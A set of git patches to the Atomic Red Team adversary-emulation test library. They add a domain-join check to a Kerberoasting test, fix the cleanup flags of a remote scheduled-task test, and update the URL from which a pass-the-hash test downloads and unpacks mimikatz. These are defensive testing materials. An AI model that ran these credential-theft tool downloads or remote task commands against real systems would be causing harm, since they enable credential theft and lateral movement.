From fe4485d818afd7bde97c262ecd80b36708ca7543 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Fri, 30 Jul 2021 16:57:50 -0600 Subject: [PATCH 1/6] add domain joined check (#1577) --- atomics/T1558.003/T1558.003.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml index e941e8ec..58abe080 100644 --- a/atomics/T1558.003/T1558.003.yaml +++ b/atomics/T1558.003/T1558.003.yaml @@ -12,6 +12,13 @@ atomic_tests: If the testing domain doesn't have any service principal name configured, there is no output supported_platforms: - windows + dependencies: + - description: | + Computer must be domain joined + prereq_command: | + if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} + get_prereq_command: | + Write-Host Joining this computer to a domain must be done manually executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 From 67c6569748e5a79d83544510e8211700faedde40 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 30 Jul 2021 22:58:17 +0000 Subject: [PATCH 2/6] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 12 ++++++++++++ atomics/T1558.003/T1558.003.md | 12 ++++++++++++ 2 files changed, 24 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 751f537e..76205d85 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -2345,6 +2345,18 @@ credential-access: there is no output\n" supported_platforms: - windows + dependencies: + - description: 'Computer must be domain joined + +' + prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) + {exit 0} else {exit 1} + +' + get_prereq_command: 'Write-Host Joining this computer to a domain must be + done manually + +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md index a3155891..a2b11589 100644 --- a/atomics/T1558.003/T1558.003.md +++ b/atomics/T1558.003/T1558.003.md @@ -47,6 +47,18 @@ Invoke-Kerberoast | fl +#### Dependencies: Run with `powershell`! +##### Description: Computer must be domain joined +##### Check Prereq Commands: +```powershell +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Write-Host Joining this computer to a domain must be done manually +``` + +
From 9bf1327611ef4deccad808d99d78245769ca551e Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Fri, 30 Jul 2021 17:00:00 -0600 Subject: [PATCH 3/6] fix cleanup command (#1575) --- atomics/T1053.005/T1053.005.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml index 59a7b460..457cc87d 100644 --- a/atomics/T1053.005/T1053.005.yaml +++ b/atomics/T1053.005/T1053.005.yaml @@ -77,7 +77,7 @@ atomic_tests: command: | SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} cleanup_command: | - SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /F >nul 2>&1 + SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd From c5d92e8cc058f6a3a8183fa1ffa3d522fd3d0c7c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 30 Jul 2021 23:00:49 +0000 Subject: [PATCH 4/6] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 6 +++--- atomics/T1053.005/T1053.005.md | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 76205d85..6d0006fd 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -16382,7 +16382,7 @@ privilege-escalation: "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} ' - cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} + cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 ' @@ -44749,7 +44749,7 @@ persistence: "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} ' - cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} + cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 ' @@ -60612,7 +60612,7 @@ execution: "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} ' - cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} + cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 ' diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md index a2a34da5..592679bd 100644 --- a/atomics/T1053.005/T1053.005.md +++ b/atomics/T1053.005/T1053.005.md @@ -129,7 +129,7 @@ SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" #### Cleanup Commands: ```cmd -SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /F >nul 2>&1 +SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 ``` From 51f463605ca856a38412b1ebd49359d261b6c7e4 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Fri, 30 Jul 2021 17:01:31 -0600 Subject: [PATCH 5/6] update mimikatz download URL (#1576) --- atomics/T1550.002/T1550.002.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1550.002/T1550.002.yaml b/atomics/T1550.002/T1550.002.yaml index fbb85382..416e222d 100644 --- a/atomics/T1550.002/T1550.002.yaml +++ b/atomics/T1550.002/T1550.002.yaml @@ -34,7 +34,7 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force From b994e94e4028f8e60d7deadb80ca1d2a42a7d569 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 30 Jul 2021 23:02:02 +0000 Subject: [PATCH 6/6] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 ++-- atomics/T1550.002/T1550.002.md | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 6d0006fd..631c63eb 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -30038,7 +30038,7 @@ defense-evasion: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force @@ -62522,7 +62522,7 @@ lateral-movement: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md index d0fc6f04..14e71e5b 100644 --- a/atomics/T1550.002/T1550.002.md +++ b/atomics/T1550.002/T1550.002.md @@ -57,7 +57,7 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1} ##### Get Prereq Commands: ```powershell $mimikatz_path = cmd /c echo #{mimikatz_path} -Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" +Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force